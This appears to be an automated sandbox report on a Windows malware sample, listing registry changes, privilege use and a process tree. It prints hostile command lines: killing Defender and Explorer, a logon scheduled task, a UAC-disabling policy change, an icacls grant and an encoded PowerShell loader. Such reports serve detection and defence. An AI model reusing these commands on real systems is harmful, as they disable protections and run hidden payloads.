psiphon3.exejaffa.exeyvhwidyjet.execmd.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\psiphon\ = "URL:psiphon" psiphon3.exe Key created \REGISTRY\MACHINE\Software\Classes\CLV.Classes jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom1 = "E0F36BB4FE6B22A9D109D0A18A7D9164" jaffa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsf yvhwidyjet.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\psiphon psiphon3.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\psiphon\shell\open psiphon3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com4 = "7EF5FC8F482985699046D72B7DE2BDEEE643584167426244D69D" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" yvhwidyjet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs yvhwidyjet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg yvhwidyjet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\psiphon\URL Protocol psiphon3.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\psiphon\shell\open\command psiphon3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com1 = "32352D7E9C2182586A3576D4772F2CAD7DF465DD" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom2 = "183DC6081594DAB0B8BE7C90ED9434BA" jaffa.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSH\ = "txtfile" yvhwidyjet.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsh yvhwidyjet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" yvhwidyjet.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\\psiphon3.exe\" -- \"%1\"" psiphon3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com2 = "6BCAFABCF964F2E4830C3A4786EB3997B08802FF4268033AE2C4459A08A3" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" yvhwidyjet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc yvhwidyjet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc\ = "txtfile" yvhwidyjet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSF\ = "txtfile" yvhwidyjet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com3 = "2EC2B05844EE399D52BEBAA2339DD4CF" jaffa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat yvhwidyjet.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\psiphon\shell psiphon3.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3648 WINWORD.EXE 3648 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 63 IoCs
Processes:
msedge.exemsedge.exepowershell.exejaffa.exevhivgvifgkpczqi.exeyypfyixy.exeyvhwidyjet.exedxiawlncxveuy.exepid process 212 msedge.exe 212 msedge.exe 2512 msedge.exe 2512 msedge.exe 5612 powershell.exe 5612 powershell.exe 5612 powershell.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 4436 vhivgvifgkpczqi.exe 4436 vhivgvifgkpczqi.exe 4436 vhivgvifgkpczqi.exe 4436 vhivgvifgkpczqi.exe 4436 vhivgvifgkpczqi.exe 4436 vhivgvifgkpczqi.exe 4436 vhivgvifgkpczqi.exe 4436 vhivgvifgkpczqi.exe 4244 yypfyixy.exe 4244 yypfyixy.exe 4244 yypfyixy.exe 4244 yypfyixy.exe 4244 yypfyixy.exe 4244 yypfyixy.exe 4244 yypfyixy.exe 4244 yypfyixy.exe 4436 vhivgvifgkpczqi.exe 4436 vhivgvifgkpczqi.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
msedge.exepid process 2512 msedge.exe 2512 msedge.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
taskkill.exeRover.exescary.exetaskkill.exetaskkill.exetaskkill.execmd.exepowershell.exedescription pid process Token: SeDebugPrivilege 776 taskkill.exe Token: SeDebugPrivilege 1784 Rover.exe Token: SeDebugPrivilege 6088 scary.exe Token: SeDebugPrivilege 5340 taskkill.exe Token: SeDebugPrivilege 5456 taskkill.exe Token: SeDebugPrivilege 5520 taskkill.exe Token: SeSystemtimePrivilege 4812 cmd.exe Token: SeSystemtimePrivilege 4812 cmd.exe Token: SeDebugPrivilege 5612 powershell.exe -
Suspicious use of FindShellTrayWindow 42 IoCs
Processes:
msedge.exeiexplore.exejaffa.exeyypfyixy.exevhivgvifgkpczqi.exeyvhwidyjet.exedxiawlncxveuy.exepid process 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 3236 iexplore.exe 2512 msedge.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 4244 yypfyixy.exe 4436 vhivgvifgkpczqi.exe 4244 yypfyixy.exe 4436 vhivgvifgkpczqi.exe 4244 yypfyixy.exe 4436 vhivgvifgkpczqi.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe -
Suspicious use of SendNotifyMessage 39 IoCs
Processes:
msedge.exejaffa.exeyypfyixy.exevhivgvifgkpczqi.exeyvhwidyjet.exedxiawlncxveuy.exepid process 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 2512 msedge.exe 5252 jaffa.exe 5252 jaffa.exe 5252 jaffa.exe 4244 yypfyixy.exe 4436 vhivgvifgkpczqi.exe 4244 yypfyixy.exe 4436 vhivgvifgkpczqi.exe 4244 yypfyixy.exe 4436 vhivgvifgkpczqi.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5440 yvhwidyjet.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe 5632 dxiawlncxveuy.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exepsiphon3.exeIEXPLORE.EXEWINWORD.EXEpid process 3236 iexplore.exe 3236 iexplore.exe 4516 psiphon3.exe 4516 psiphon3.exe 624 IEXPLORE.EXE 624 IEXPLORE.EXE 624 IEXPLORE.EXE 624 IEXPLORE.EXE 3648 WINWORD.EXE 3648 WINWORD.EXE 3648 WINWORD.EXE 3648 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
lol.exeloader.execmd.execmd.exemsedge.exedescription pid process target process PID 1892 wrote to memory of 3756 1892 lol.exe loader.exe PID 1892 wrote to memory of 3756 1892 lol.exe loader.exe PID 3756 wrote to memory of 556 3756 loader.exe cmd.exe PID 3756 wrote to memory of 556 3756 loader.exe cmd.exe PID 556 wrote to memory of 4812 556 cmd.exe cmd.exe PID 556 wrote to memory of 4812 556 cmd.exe cmd.exe PID 4812 wrote to memory of 776 4812 cmd.exe taskkill.exe PID 4812 wrote to memory of 776 4812 cmd.exe taskkill.exe PID 4812 wrote to memory of 1784 4812 cmd.exe Rover.exe PID 4812 wrote to memory of 1784 4812 cmd.exe Rover.exe PID 4812 wrote to memory of 1784 4812 cmd.exe Rover.exe PID 4812 wrote to memory of 2512 4812 cmd.exe msedge.exe PID 4812 wrote to memory of 2512 4812 cmd.exe msedge.exe PID 2512 wrote to memory of 1040 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 1040 2512 msedge.exe msedge.exe PID 4812 wrote to memory of 4372 4812 cmd.exe WScript.exe PID 4812 wrote to memory of 4372 4812 cmd.exe WScript.exe PID 4812 wrote to memory of 3236 4812 cmd.exe iexplore.exe PID 4812 wrote to memory of 3236 4812 cmd.exe iexplore.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 224 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 212 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 212 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 1096 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 1096 2512 msedge.exe msedge.exe PID 2512 wrote to memory of 1096 2512 msedge.exe msedge.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
Rover.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1" Rover.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\lol.exe"C:\Users\Admin\AppData\Local\Temp\lol.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\loader.exe"C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\temp.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K main.cmd4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\system32\taskkill.exetaskkill /f /im WindowsDefender.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:776 -
C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\Rover.exeRover.exe5⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1784 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\web.htm5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff7ae246f8,0x7fff7ae24708,0x7fff7ae247186⤵PID:1040
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1452,18307236989078516195,11289246162676345410,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:26⤵PID:224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,18307236989078516195,11289246162676345410,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:212 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1452,18307236989078516195,11289246162676345410,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:86⤵PID:1096
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1452,18307236989078516195,11289246162676345410,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:16⤵PID:4600
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1452,18307236989078516195,11289246162676345410,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:16⤵PID:4316
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\helper.vbs"5⤵PID:4372
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\spinner.gif5⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3236 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3236 CREDAT:17410 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:624 -
C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\psiphon3.exepsiphon3.exe5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 17486⤵
- Program crash
PID:5488 -
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
PID:3532 -
C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\scary.exescary.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6088 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:5768 -
C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\the.exethe.exe5⤵
- Executes dropped EXE
PID:6036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5612 -
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5340 -
C:\Windows\system32\taskkill.exetaskkill /f /im explorer5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5456 -
C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\ac3.exeac3.exe5⤵
- Executes dropped EXE
PID:5716 -
C:\Windows\system32\taskkill.exetaskkill /f /im fontdrvhost5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5520 -
C:\Windows\system32\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F,M)5⤵
- Modifies file permissions
PID:5920 -
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\jaffa.exejaffa.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5252 -
C:\Windows\SysWOW64\yvhwidyjet.exeyvhwidyjet.exe6⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
